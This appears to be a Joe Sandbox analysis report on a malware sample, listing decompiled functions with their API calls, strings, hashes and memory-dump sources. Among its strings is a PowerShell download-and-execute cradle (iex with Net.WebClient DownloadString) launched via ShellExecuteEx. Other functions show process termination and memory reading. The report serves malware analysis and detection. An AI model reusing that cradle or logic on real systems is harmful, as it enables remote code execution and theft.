Instruction Fuzzy Hash: 7C518E30610208EFCB14EFA5DD95FDD7775AF40304F008029F90A6F291DB78AA55CB5A

Function 61E01040 Relevance: 10.6, APIs: 7, Instructions: 132sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,61E012DC), ref: 61E01077
_amsg_exit.MSVCRT ref: 61E010A4

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
Instruction ID: a154691f748ef5392a7e4955094c5928503ae470ce452f5208c2c148eeae8840
Opcode Fuzzy Hash: a124d45cb5394699c2ab659ebe120ec1ccf49b51c805edf607fecf4702c5277b
Instruction Fuzzy Hash: 13414F71B146818FEB00AFE8C98470BB7F1EB85399F64C53DE4A48B344D775D9918B82

Function 004199A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004199C5
Process32First.KERNEL32(0040A056,00000128), ref: 004199D9
Process32Next.KERNEL32(0040A056,00000128), ref: 004199F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00419A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419A6C
CloseHandle.KERNEL32(00000000), ref: 00419A79
CloseHandle.KERNEL32(0040A056), ref: 00419A88

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction ID: 88ad4043d03276f3ee8d31f644ab7db47d0d0c060b431017ba6a9ada5f45e9a4
Opcode Fuzzy Hash: d164d69eee064959a682f4fee3bb2d75b95a0ad327ad163940014db5e985719e
Instruction Fuzzy Hash: 06211A70900258ABDB25DFA1DC98BEEB7B9BF48304F0041C9E509A6290D7789FC4CF51

Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
CloseHandle.KERNEL32(000000FF), ref: 004194B7

Strings

>=A, xrefs: 004194A1, 004194CD, 004194A4
>=A, xrefs: 00419488, 0041948B

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=A$>=A
API String ID: 1378416451-3536956848
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85

Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B69A

Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B2E6

DecodePointer.KERNEL32(0042A258,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B6E7

Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138

DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B70D
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B720
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A218,0000000C,0041AF3A), ref: 0041B72A

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
Instruction ID: 83cc19c0f9a08cc6c8264b8aa057ea451e2e215f117fa7a6923d46f1cea91310
Opcode Fuzzy Hash: d852e3d7d835d6e62f18a9395bea30f13d719b1b24e180a4b449e11ade6884fe
Instruction Fuzzy Hash: D131F974900349DFDF11AFA9D9856DDBAF1FF88314F14402BE460A62A0DBB84985CF99

Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CD1A

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__amsg_exit.LIBCMT ref: 0041CD3A
__lock.LIBCMT ref: 0041CD4A
InterlockedDecrement.KERNEL32(?), ref: 0041CD67
free.MSVCRT ref: 0041CD7A
InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
Instruction ID: 9bccb4d37e88352bd342e74b92a79a764fb3ddc235490c160eda478cd1c3264c
Opcode Fuzzy Hash: 525e96ac9f68bb1e385b36e47090da98a0ef9a1698a14b7f5a5138d390f6750c
Instruction Fuzzy Hash: C8018835A816219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD

Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041719F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD

Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85

VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333

Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078

Strings

@, xrefs: 00417226

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5

Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69

Strings

zn@, xrefs: 00406A0D, 00406A19, 00406A2C, 00406A35, 00406A59, 00406A82, 00406A85, 00406B3F, 00406B51, 00406B5D, 00406B66, 00406BE3, 00406B99, 00406A9A, 00406ABD, 00406AC9, 00406AF1, 00406B21, 00406B33, 00406AFD, 00406B0A, 00406AA6
zn@, xrefs: 00406B78, 00406C06, 00406C0B, 00406BB5

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: zn@$zn@
API String ID: 1029625771-1156428846
Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95

Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5

Strings

<, xrefs: 00412F89
')", xrefs: 00412F03
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: b1d6d6e6ddb63405df561fc4134c7f7c536001f1b95d11fefc732fe9707bbb46
Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
Opcode Fuzzy Hash: b1d6d6e6ddb63405df561fc4134c7f7c536001f1b95d11fefc732fe9707bbb46
Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99

Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410FE8
strtok_s.MSVCRT ref: 0041112D

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
Opcode Fuzzy Hash: 77d8088bb27251dd49dfcd07a26e8087964298c25f1e83629a7bc62193e0fc7a
Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95

Function 6CFF0C1A Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6CFF0C57
dllmain_crt_dispatch.LIBCMT ref: 6CFF0C6E
dllmain_raw.LIBCMT ref: 6CFF0CB6
dllmain_crt_dispatch.LIBCMT ref: 6CFF0CC9
dllmain_raw.LIBCMT ref: 6CFF0CDC

Memory Dump Source

Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 496d0295ac2335c7c1224ef69ce366e867a485541ce5617034c0dd301fdb04fa
Instruction ID: e09c7450f533b02a9d9c6c768b2f90bf660d5ad5b14910876479b4836033676b
Opcode Fuzzy Hash: 496d0295ac2335c7c1224ef69ce366e867a485541ce5617034c0dd301fdb04fa
Instruction Fuzzy Hash: FC218372D01699EADB115F55CC40EAF3A79EB81798F118115F83867B74CBB09D038BE0

Function 00416BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(004210F4,?,?,00416DB1,00000000,?,0096C238,?,004210F4,?,00000000,?), ref: 00416C0C
sscanf.NTDLL ref: 00416C39
SystemTimeToFileTime.KERNEL32(004210F4,00000000,?,?,?,?,?,?,?,?,?,?,?,0096C238,?,004210F4), ref: 00416C52
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0096C238,?,004210F4), ref: 00416C60
ExitProcess.KERNEL32 ref: 00416C7A

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
Instruction ID: 1a92bae8d2aea180e7b918fcc5e881d349bf880cfa552010dcbd9d747ca2879d
Opcode Fuzzy Hash: 8f3d302021b633d499eebc2b75f511318c1b224c781d312d182f2b4f083543dc
Instruction Fuzzy Hash: 0321CD75D142089BCF14DFE4E9459EEB7BABF48300F04852EF506A3250EB349644CB69

Function 004193F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(00974110,00000000,00000000,?,00409F71,00000000,00974110,00000000), ref: 004193FC
lstrcpyn.KERNEL32(006D7580,00974110,00974110,?,00409F71,00000000,00974110), ref: 00419420
